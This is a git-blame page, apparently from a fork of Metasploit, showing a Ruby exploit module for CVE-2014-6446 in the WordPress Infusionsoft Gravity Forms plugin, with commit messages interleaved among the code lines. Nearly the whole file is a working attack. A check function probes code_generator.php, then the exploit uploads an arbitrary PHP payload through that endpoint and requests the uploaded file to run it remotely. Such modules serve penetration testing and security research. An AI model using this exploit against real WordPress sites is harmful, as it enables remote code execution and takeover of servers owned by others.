adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb
T

80 lines
2.6 KiB
Ruby
Raw Normal View History

Wordpress Infusionsoft Gravity Forms CVE-2014-6446
2014-10-06 14:10:01 +02:00
##
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
Wordpress Infusionsoft Gravity Forms CVE-2014-6446
2014-10-06 14:10:01 +02:00
# Current source: https://github.com/rapid7/metasploit-framework
##
use MetasploitModule as a class name
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
Wordpress Infusionsoft Gravity Forms CVE-2014-6446
2014-10-06 14:10:01 +02:00
Rank = ExcellentRanking
Update moduels using Msf::HTTP::Wordpress
2015-10-15 11:47:13 -05:00
include Msf::Exploit::Remote::HTTP::Wordpress
Wordpress Infusionsoft Gravity Forms CVE-2014-6446
2014-10-06 14:10:01 +02:00
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress InfusionSoft Upload Vulnerability',
'Description' => %q{
Trivial grammar fixes
2014-10-14 12:00:50 -05:00
This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity
Fix description
2014-10-08 16:35:14 -05:00
Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
upload and remote code execution.
Wordpress Infusionsoft Gravity Forms CVE-2014-6446
2014-10-06 14:10:01 +02:00
},
'Author' =>
[
'g0blin', # Vulnerability Discovery
'us3r777 <us3r777@n0b0.so>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-6446'],
['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
Add reference
2014-10-09 06:58:15 +02:00
['WPVDB', '7634']
Wordpress Infusionsoft Gravity Forms CVE-2014-6446
2014-10-06 14:10:01 +02:00
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
'DisclosureDate' => 'Sep 25 2014',
'DefaultTarget' => 0)
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
)
Do minor cleanup
2014-10-08 16:29:11 -05:00
if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
Change the check function
2014-10-06 18:56:01 +02:00
return Exploit::CheckCode::Detected
end
Do minor cleanup
2014-10-08 16:29:11 -05:00
Wordpress Infusionsoft Gravity Forms CVE-2014-6446
2014-10-06 14:10:01 +02:00
Exploit::CheckCode::Safe
end
def exploit
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft',
'Infusionsoft', 'utilities', 'code_generator.php'),
'method' => 'POST',
'vars_post' =>
{
'fileNamePattern' => php_pagename,
'fileTemplate' => payload.encoded
}
})
Do minor cleanup
2014-10-08 16:29:11 -05:00
if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
print_good("Our payload is at: #{php_pagename}. Calling payload...")
Wordpress Infusionsoft Gravity Forms CVE-2014-6446
2014-10-06 14:10:01 +02:00
register_files_for_cleanup(php_pagename)
else
moar fail_with's
2015-04-16 21:16:52 +02:00
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
Wordpress Infusionsoft Gravity Forms CVE-2014-6446
2014-10-06 14:10:01 +02:00
end
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
print_status("Calling payload ...")
Wordpress Infusionsoft Gravity Forms CVE-2014-6446
2014-10-06 14:10:01 +02:00
send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft',
'Infusionsoft', 'utilities', php_pagename)
Update timeout
2014-10-08 16:32:05 -05:00
}, 2)
Wordpress Infusionsoft Gravity Forms CVE-2014-6446
2014-10-06 14:10:01 +02:00
end
end
Reference in New Issue Copy Permalink